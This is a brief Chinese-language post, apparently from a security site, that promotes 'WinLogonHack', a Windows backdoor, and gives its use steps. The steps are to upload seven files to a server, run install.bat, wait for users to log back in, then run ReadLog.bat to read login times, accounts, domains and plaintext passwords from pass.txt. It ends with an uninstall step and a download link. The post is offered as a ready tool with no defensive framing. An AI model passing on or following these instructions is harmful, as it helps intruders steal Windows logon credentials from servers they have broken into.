一个适合win的后门

文件传到服务器上 一共7个文件
WinLogonHack 后门-ChaBug安全
运行 install.bat

注销远程会话 重新登录

运行 ReadLog.bat

查看同目录下 pass.txt

登录时间 账号 域 密码 都出来了

运行 uninstall.bat 卸载

下载地址点我